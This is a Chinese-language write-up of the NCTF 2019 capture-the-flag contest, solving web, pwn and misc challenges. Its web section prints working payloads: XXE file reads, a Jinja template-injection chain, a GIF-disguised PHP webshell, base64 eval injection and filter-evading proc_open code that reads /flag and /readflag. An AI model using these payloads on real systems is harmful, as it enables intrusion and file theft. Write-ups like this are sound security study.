NJUPT CTF writeup

前言

打打小比赛练练手~

WEB

Fake XML cookbook

1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE GVI [<!ENTITY flag SYSTEM "file:///flag" >]>
<user>
<username>&flag;</username>
<password>admin</password>
</user>
1
NCTF{W3lc0m3_T0_NCTF_9102}

True XML cookbook(未解出)

flask

1
{{().__class__.__bases__[0].__subclasses__()[40]('/f'+'lag').read()}}

额,算是非常简单的SSTI了,可以看我博客:sketchplane.top

upload your shell

1, 直接上传一个v01cano.jpg文件,文件内容如下:

1
GIF89a<script language="php">eval($_POST[1]);</script>

2, 得到返回文件地址:

filepath:/var/www/html/upload-imgs/11d27c0cfce57aa050a1815412e1bb81/Th1s_is_a_fl4g.jpg

img

3, 直接利用文件读取漏洞,读取Th1s_is_a_fl4g.jpg文件的内容:

http://nctf2019.x1ct34m.com:60002/index.php?action=upload-imgs/11d27c0cfce57aa050a1815412e1bb81/Th1s_is_a_fl4g.jpg

得到flag如下:

1
NCTF{upload_1s_s0_funn7}

simple_xss

直接在内容框中插入一段打cookie的js代码,成功获取cookie:

替换cookie获取flag:

SQLi

“/robots.txt”->“/hint.txt”

1
2
3
4
5
6
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

不多说废话直接上图

脚本会检测到%00,手工Fuzz,wsl

phar matches everything (未解出)

Warning: getimagesize(http://nctf2019.x1ct34m.com:40004/upload.php%00.jpg): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/html/catchmime.php on line 28
File is not an image.

参考链接:
https://www.secpulse.com/archives/94680.html
https://www.cnblogs.com/BOHB-yunying/p/11504051.html
https://blog.csdn.net/xiaorouji/article/details/83118619

easyphp

1
2
3
4
?num=23333%0a
&str1=240610708
&str2=QPPQKSY
&q.w.q=ca\t *

这道题学到不少2333

Level1

利用preg_match()不匹配换行符 (应该是,有时候感觉这种东西不好说= =

Level2

strtr()是按单个字符匹配替换的。。。

Level3

$_GET[‘c_m_d’] ,传参时 c_m_d 等价于 c.m.d

cat * 直接getflag

replace

pat=xxx&sub=xxx&rep=%40eval(%40base64_decode(%24_POST%5Bn0ee1cca39220e%5D))%3B&n0ee1cca39220e=c3lzdGVtKCJjYXQgL2ZsYWciKTs=

1
NCTF{getshe11_has_different_methods}

backdoor

payload:

1
2
3
4
5
6
7
8
9
10
11
12
code=$p = proc_.open;
$p1 = p.i.pe;
$s = stre.am_.ge.t_con.te.nts;
$arr = array(
0 = array($p1,r),
1 = array($p1,w),
2 = array(fi.le,tmperror.l.og, a)
);
$cwd = ;
$env = array();
$process = $p(readflag, $arr, $p1, $cwd,$env);echo $s($p1[1]);
&useful=etcpasswd

search directory:

1
2
3
?code=$a=$p="/readflag";$d="d"."i"."r";$o=$d($p);$r="r"."e"."a"."d";while (false !== ($entry = $o->$r())) {
echo $entry."\n";
}&useful=/etc/passwd

readfile:

1
2
?code=$v="var_"."dump";$f="fil"."e";$v($f("/readflag"));
&useful=/etc/passwd

RCE:

1
2
3
4
5
6
7
8
9
10
11
12
?code=$p = "proc_"."open";
$p1 = "p"."i"."pe";
$s = "stre"."am_"."ge"."t_con"."te"."nts";
$arr = array(
0 => array($p1,"r"),
1 => array($p1,"w"),
2 => array("fi"."le","/tmp/error.l"."og", "a")
);
$cwd = "/";
$env = array();
$process = $p("/readflag", $arr, $p1, $cwd,$env);echo $s($p1[1]);
&useful=/etc/passwd

我的心路历程都在这了。。。

RE

DEBUG

1
NCTF{just_debug_it_2333}

参考链接:https://blog.csdn.net/weixin_42621117/article/details/99768988

PWN

hello_pwn

1
2
3
4
5
6
from pwn import *

r = remote('139.129.76.65', 50003)
r.recvline()
r.recvline()
r.recvline()
1
NCTF{hell0__play}

MISC

a_good_idea

图片尾部附加了压缩包,解压得到提示和两个图片,提示比较两图片像素,使用Stegsolve “to_do.png”-“to.png”=flag

1
NCTF{m1sc_1s_very_funny!!!}

Become a Rockstar

所有“says”后面的东西拼一下

1
NCTF{youarnicerockstar}

Bright Body I

\Bright Body I\Magic\Content\Paks\Magic-WindowsNoEditor.pak文件中直接搜“NCTF”得到flag

1
NCTF{R_U_4_D4rk5Ou1s_III_P14y3r}

有内鬼,终止交易

1
2
3
4
5
6
7
8
9
10
// config.json
{
"server":"123.207.121.32",
"server_port":25565,
"local_port":1080,
"password":"5e77b05530b30283e24c120d8cc13fb5",
"timeout":600,
"method":"aes-256-cfb",
"local_address":"127.0.0.1"
}

shadowsocks流量包解密

键盘侠

伪加密解压得到图片,尾部附加doc文档,文件-选项-显示隐藏文字,选中文字-字体-取消隐藏-复制-base85解密得到flag

1
2
3
4
5
# 原文
PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE

# flag
NCTF{Ba3e85_issssss_so_xxxxx}

参考链接:https://www.cnblogs.com/Yuuki-/p/7897069.html

What’s this

导出压缩包,伪加密解密得到文本文件,base64隐写解密,二进制转字符串得到flag

1
NCTF{dbb2ef54afc2877ed9973780606a3c8b}

2077

i:0-2986
https://vod-secure.twitch.tv/0b27f6f98c0cbb6c6c1e_cdprojektred_30100213392_949888768/360p30/i.ts
https://vod-secure.twitch.tv/0b27f6f98c0cbb6c6c1e_cdprojektred_30100213392_949888768/chunked/i.ts

wget -i dl.csv

ffmpeg -f concat -i filelist.txt -c copy output.mp4

ffmpeg -i output.mp4 -r 0.018 image-%05d.jpg

1
2
3
4
5
6
7
8
9
10
11
12
13
PSC:\>./drop_package
iVBORw0KGgoAAAANSUhEUgAAB4AAAAQ4CAIAAABnSVYUAAjxYk1EQVR4AYzYBXPbyrcA8JQS
s0VmjplR5khmhpgxdhx0kzTc9DK0vfjud35HVv6+KTyY+c3O0eosaAUzq+ce/xrD95zhEQCX

BwMOtwDYXUKHW+RyIsDjxoDXiy6Jgc+HsJaHQuD2CV1eaMgDy+28m5th9wiWeOAxdiM21/hL
bD6wunhPWZzcL0E9m/zFKFAv/JLdI3J6sc/Axbq9OHtdfi8W8OEBHxoK4I9C/EhE9CgmZsUS
aCwm+1xcAqIxYgn7f4pE8f8F2xt0uxKP4SAWxUAkjIRJcZhEQ0GmjISxaFQciyHxuDiRQLa2

SCWEQYlWEglGPC4EsZjocwkhiCdFgG1LUThNE0+1UhJA0xgjhVC0GEBAp0QglRYDOi2jUtKn
tmjJEp6ksE8hYItG13AqRUAyNAepjDyVkaazMrYE2bwCQPAUpIHHnLQUZGh8JUujuRQGJStD

/TEA9yKRYB6ARAIeIYKiJRBudyqFA2YFcsI1/pIYUHnZVk4aLUhDGcyxJTNFUJ2HkFkEMhVP
ouAoZQy1cl2r5mj160CtfQkUKgFQaUQaHQK0ehRiqJEpeECu5LPBV0nlXIaMvyKTC8DTHKVq

pip install

运行命令pip install –user nctf-2019-installme,在控制台输出包含压缩包下载链接,下载解压得到源码,在“setup.py”找到base64加密的flag,解码得到

1
NCTF{c4reful_ab0u7_ev1l_pip_p4ckage}

卸载库pip uninstall nctf-2019-installme,真实flag文件位置在//TODO

NCTF2019问卷调查

1
NCTF{Thank_you_for_participating_NCTF2019!}

keyboard

wertyuio分别对应2-9,对应手机九键…

1
NCTF{youaresosmartthatthisisjustapieceofcake}

小结

真就差1名呗= =

已经是第三次差一点了,主要还是wtcl,有一个flask debug 还差一点。

另外感谢T1M师傅和火山师傅带飞~

0%